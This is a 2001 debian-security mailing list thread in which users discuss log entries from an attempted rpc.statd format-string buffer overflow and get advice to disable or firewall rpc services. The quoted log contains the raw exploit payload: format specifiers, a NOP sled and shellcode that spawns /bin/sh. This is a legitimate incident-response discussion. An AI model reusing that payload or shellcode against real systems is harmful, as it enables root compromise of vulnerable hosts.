Re: was I cracked? (rpc.statd, new version)
Thanks for this explanation. I got hit with the exact same
exploit this evening. I compared my entire /etc structure to
a known good one from almost a month ago and everything checks
out. I'm taking you advise and shutting down this service
when not using it until I can secure it properly.
thanks,
jc
Thusly Thwacked By Jeremy Gaddis:
> Someone attempted to run the rpc.statd buffer overflow on
> you, but it appears to have failed. The reason you see
> "/bin/sh" in the log entry is because that's part of the
> shellcode of the exploit. The exploit, when successful,
> executes /bin/sh on your machine and leaves the attacker
> sitting at a root shell prompt.
>
> As someone else stated, disable the rpc.* services if you
> don't need them. If you do, they should be firewalled off
> and only accept packets from machines they need to "converse"
> with.
>
> j.
>
> --
> Jeremy L. Gaddis <jlgaddis@blueriver.net>
>
> -----Original Message-----
> From: Lukas Eppler [mailto:lukas.eppler@tempobrain.com]
> Sent: Wednesday, July 11, 2001 5:42 AM
> To: debian-security@lists.debian.org
> Subject: was I cracked? (rpc.statd, new version)
>
>
> I have the following entries in /var/log/messages:
>
> Jul 9 01:21:03 blue -- MARK --
> Jul 9 01:21:11 blue
> Jul 9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for
> ^X<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z
> <F7><FF><BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x
> %n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220
> Jul 9 01:21:11 blue
> <C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\211<F3><B0>^K<CD>
> \200<B0>^A<CD>\200<E8>\177<FF><FF><FF>
> Jul 9 01:41:03 blue -- MARK --
>
> I run debian 2.2, nfs-common is Version: 1:0.1.9.1-1 which has the long
> known
> exploit fixed. I can't find modified binaries or any strange
> behaviour... was
> this a defeated attack? The second line says /bin/sh somewhere which
> makes me
> a bit concerned... Was I cracked?
>
> Lukas
>
--
Jeff Coppock Nortel Networks
Systems Engineer http://nortelnetworks.com
Major Accts. Santa Clara, CA
Reply to: